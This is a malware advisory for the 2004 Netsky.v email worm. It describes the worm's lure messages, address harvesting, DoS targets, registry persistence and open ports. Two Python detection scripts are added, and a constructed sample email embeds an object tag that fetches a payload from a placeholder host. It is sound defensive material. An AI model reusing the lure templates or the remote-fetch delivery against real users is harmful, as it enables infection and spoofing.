W32/Netsky.v@MM

Type: Virus
SubType: E-mail
Discovery Date: 04/14/2004
Length: 19,432 bytes
Minimum DAT: 4352 (04/21/2004)
Updated DAT: 4994 (03/28/2007)
Minimum Engine: 5.1.00
Description Added: 04/14/2004
Description Modified: 04/15/2004 8:41 AM (PT)

Risk Assessment
Corporate User: Low-Profiled
Home User: Low-Profiled

Characteristics

--Update 04/15/2004 08:00 PST
W32/Netsky.v@MM has been updated to Low-Profiled due to press coverage (http://www.theregister.co.uk/2004/04/15/pesky_netsky/).

This variant of W32/Netsky is similar to previous variants, but it does not spread as an email attachment; instead the message carries a hyperlink pointing to an infected system. It bears the following characteristics:

  • infects by spreading exploit script, which automatically downloads and executes the virus from a remote infected system
  • constructs messages using its own SMTP engine
  • harvests email addresses from the victim machine
  • spoofs the To: and From: address of messages
  • opens ports on the victim machine (TCP 5556 & 5557)
  • delivers a DoS attack on certain web sites upon a specific date condition

Mail Propagation

Email addresses are harvested from the victim machine. Files with the following extensions are searched:

  • .adb
  • .asp
  • .cfg
  • .cgi
  • .dbx
  • .dhtm
  • .doc
  • .eml
  • .htm
  • .html
  • .jsp
  • .mbx
  • .mdx
  • .mht
  • .mmf
  • .msg
  • .nch
  • .ods
  • .oft
  • .php
  • .pl
  • .ppt
  • .rtf
  • .sht
  • .shtm
  • .stm
  • .tbb
  • .txt
  • .uin
  • .vbs
  • .wsh
  • .wab
  • .xls
  • .xml

Constructed messages bear the following characteristics:

To: dimitrihji@yahoo.com (this is spoofed)
From: dimitrihji@yahoo.com (this is also spoofed; it is not the true receiving address)
Subject: (taken from the following list)

  • Mail Delivery Sytem failure
  • Mail delivery failed
  • Server Status failure
  • Gateway Status failure

Body text: (taken from the following list)

  • The processing of this message can take a few minutes...
  • Converting message. Please wait...
  • Please wait while loading failed message...
  • Please wait while converting the message...

Rather than including an attachment, the HTML within the message contains exploit code that contacts a remote website to download the infected file. This HTML script is detected with 4352 DATs and higher as Exploit-ObjectData. The remote infected computer is contacted via HTTP on TCP port 5557; the remote HTML file, once launched, drops an FTP "script" that downloads the Netsky.v executable from the remote machine via TCP port 5556 and then infects the local machine by executing the downloaded file.
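
The message characteristics above (template subjects, template body text, and HTML that fetches its payload from a host on TCP port 5557 through an object-data tag) can be turned into a mail-gateway triage rule. The following is an added example written for this page, not McAfee's own detection or code from the worm; it uses Python's standard email parser, and the two sample messages are constructed for the demonstration (the 192.0.2.10 address is a documentation-range placeholder). It flags a message only when a template subject coincides with an HTML indicator, which keeps an ordinary bounce notice with a similar subject from being quarantined.

```python
from __future__ import annotations

import email
import re
from email import policy

# Indicators taken from the description above.
NETSKY_V_SUBJECTS = {
    "Mail Delivery Sytem failure",
    "Mail delivery failed",
    "Server Status failure",
    "Gateway Status failure",
}
NETSKY_V_BODY_TEXT = (
    "The processing of this message can take a few minutes...",
    "Converting message. Please wait...",
    "Please wait while loading failed message...",
    "Please wait while converting the message...",
)
# The message HTML pulls its payload from the infected sender over HTTP on TCP 5557.
PORT_5557_URL = re.compile(r"https?://[^\s\"'<>]+:5557\b", re.IGNORECASE)
# Exploit-ObjectData: an <object> element whose data attribute points at remote content.
OBJECT_DATA_TAG = re.compile(r"<object[^>]*\bdata\s*=", re.IGNORECASE)


def triage_message(raw: bytes) -> list[str]:
    """Return the Netsky.V indicators matched by one raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits: list[str] = []
    subject = (msg["Subject"] or "").strip()
    if subject in NETSKY_V_SUBJECTS:
        hits.append(f"subject matches worm template: {subject!r}")
    # Gather every text/* part; the worm sends a single HTML body.
    parts = [p.get_content() for p in msg.walk() if p.get_content_maintype() == "text"]
    text = "\n".join(parts)
    for phrase in NETSKY_V_BODY_TEXT:
        if phrase in text:
            hits.append(f"body matches worm template: {phrase!r}")
            break
    if PORT_5557_URL.search(text):
        hits.append("HTML references a URL on TCP port 5557")
    if OBJECT_DATA_TAG.search(text):
        hits.append("HTML contains an <object data=...> tag")
    return hits


def is_suspected_netsky_v(raw: bytes) -> bool:
    """Quarantine for review when a template subject coincides with an HTML indicator."""
    hits = triage_message(raw)
    has_subject = any(h.startswith("subject") for h in hits)
    has_html = any(h.startswith("HTML") for h in hits)
    return has_subject and has_html


# Constructed sample message (not a capture); host and port are placeholders
# assembled from the indicators listed above.
SAMPLE_WORM_MAIL = b"""From: dimitrihji@yahoo.com
To: dimitrihji@yahoo.com
Subject: Mail delivery failed
Content-Type: text/html; charset=us-ascii

<html><body>Converting message. Please wait...
<object data="http://192.0.2.10:5557/" type="text/html"></object>
</body></html>
"""

# Constructed benign message for comparison.
SAMPLE_BENIGN_MAIL = b"""From: alice@example.org
To: bob@example.org
Subject: Lunch tomorrow?
Content-Type: text/plain; charset=us-ascii

Are you free at noon?
"""

if __name__ == "__main__":
    for name, raw in (("worm", SAMPLE_WORM_MAIL), ("benign", SAMPLE_BENIGN_MAIL)):
        print(name, is_suspected_netsky_v(raw), triage_message(raw))
```

The subject list is matched exactly, including the worm's own misspelling of "System", because a deliberate typo in a template is itself a useful signature; a gateway that normalises subjects before matching would lose it.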

Denial of Service

This worm targets the following remote servers in a denial of service attack:

  • www.keygen.us
  • www.freemule.net
  • www.kazaa.com
  • www.emule.de
  • www.cracks.am

System Changes

The worm installs itself on the victim machine as KasperskyAVEng.exe in the Windows directory:

  • %WinDir%\KasperskyAVEng.exe

The following Registry key is added to hook system startup:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "KasperskyAVEng" = %WinDir%\KasperskyAVEng.exe

A copy of the worm is saved to disk as SKYAV.TMP in the Windows directory:

  • %WinDir%\skyav.tmp

Remote Access Component

The worm opens a web server on TCP port 5557 which, on vulnerable systems, will load an HTM file that is heuristically detected by DATs up to 4352 as Unsafe Script. Specific detection will be added to the 4352 DATs as Exploit-ObjectData.

The virus also opens an FTP server on TCP Port 5556, so that the infected system can be accessed remotely.

Symptoms

  • Outgoing DNS query to one of the following DNS servers (IP list carried within the worm):
    • 212.44.160.8
    • 195.185.185.195
    • 151.189.13.35
    • 213.191.74.19
    • 193.189.244.205
    • 145.253.2.171
    • 193.141.40.42
    • 194.25.2.134
    • 194.25.2.133
    • 194.25.2.132
    • 194.25.2.131
    • 193.193.158.10
    • 212.7.128.165
    • 212.7.128.162
    • 193.193.144.12
    • 217.5.97.137
    • 195.20.224.234
    • 194.25.2.130
    • 194.25.2.129
    • 212.185.252.136
    • 212.185.253.70
    • 212.185.252.73
  • Existence of the files/Registry keys detailed above
  • TCP ports 5556 & 5557 open on the victim machine
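
The network symptoms above (outbound DNS queries to the worm's embedded resolver list and traffic on TCP 5556/5557) can be matched against perimeter logs. The block below is an added example for this page, not McAfee's code; it assumes a key=value firewall log format (src=, dst=, proto=, sport=, dport=, dir=) and the log lines, the 10.0.0.x hosts and the 203.0.113.9 address are constructed placeholders. Because some of the embedded resolvers may be public DNS servers that legitimate clients also use, a query alone is a weak indicator; the trusted_resolvers parameter lets an analyst exclude the organisation's own resolvers so that only unexpected destinations are reported.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Hard-coded DNS server addresses carried by the worm (from the Symptoms list).
NETSKY_V_DNS_SERVERS = frozenset({
    "212.44.160.8", "195.185.185.195", "151.189.13.35", "213.191.74.19",
    "193.189.244.205", "145.253.2.171", "193.141.40.42", "194.25.2.134",
    "194.25.2.133", "194.25.2.132", "194.25.2.131", "193.193.158.10",
    "212.7.128.165", "212.7.128.162", "193.193.144.12", "217.5.97.137",
    "195.20.224.234", "194.25.2.130", "194.25.2.129", "212.185.252.136",
    "212.185.253.70", "212.185.252.73",
})
# Ports opened by the worm: 5557 (HTTP, exploit page) and 5556 (FTP, payload).
NETSKY_V_PORTS = {5556, 5557}

# Assumed key=value firewall log format for this example.
LOG_RE = re.compile(
    r"src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+proto=(?P<proto>\w+)\s+"
    r"sport=(?P<sport>\d+)\s+dport=(?P<dport>\d+)\s+dir=(?P<dir>in|out)"
)


def score_log(lines, trusted_resolvers=frozenset()) -> dict[str, list[str]]:
    """Map each internal host to the Netsky.V indicators seen in its traffic."""
    findings: dict[str, list[str]] = defaultdict(list)
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        src, dst, proto = m["src"], m["dst"], m["proto"]
        dport, direction = int(m["dport"]), m["dir"]
        # Outbound query to a resolver the worm carries, unless it is one we expect.
        if direction == "out" and dport == 53 and dst in NETSKY_V_DNS_SERVERS \
                and dst not in trusted_resolvers:
            findings[src].append(f"DNS query to worm-embedded resolver {dst}")
        # Another system fetching from our host means our host is serving the worm.
        if proto == "tcp" and direction == "in" and dport in NETSKY_V_PORTS:
            findings[dst].append(f"inbound connection to worm port {dport} from {src}")
        # Our host fetching from a remote port means it is being infected.
        if proto == "tcp" and direction == "out" and dport in NETSKY_V_PORTS:
            findings[src].append(f"outbound connection to worm port {dport} on {dst}")
    return dict(findings)


# Constructed sample log lines (not a real capture).
SAMPLE_LOG = [
    "2004-04-15T08:00:01 src=10.0.0.5 dst=194.25.2.130 proto=udp sport=1034 dport=53 dir=out",
    "2004-04-15T08:00:02 src=10.0.0.5 dst=198.51.100.7 proto=tcp sport=1035 dport=25 dir=out",
    "2004-04-15T08:00:03 src=203.0.113.9 dst=10.0.0.5 proto=tcp sport=2201 dport=5557 dir=in",
    "2004-04-15T08:00:04 src=10.0.0.8 dst=203.0.113.9 proto=tcp sport=3001 dport=5556 dir=out",
    "2004-04-15T08:00:05 src=10.0.0.9 dst=10.0.0.1 proto=udp sport=1040 dport=53 dir=out",
    "this line is not in the expected format",
]

if __name__ == "__main__":
    for host, reasons in sorted(score_log(SAMPLE_LOG).items()):
        print(host)
        for reason in reasons:
            print("  -", reason)
```

The host-side symptoms (the KasperskyAVEng.exe file, the Run key and skyav.tmp) are confirmed separately on the machines this report names; the network view is what lets an analyst find them without touching every endpoint.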

Method of Infection

This worm spreads by email, constructing messages using its own SMTP engine.

Removal

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purpose of hooking system startup will be successfully removed when cleaning with the recommended engine and DAT combination (or higher).

Additional Windows ME/XP removal considerations

Variants

N/A

Overview

This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.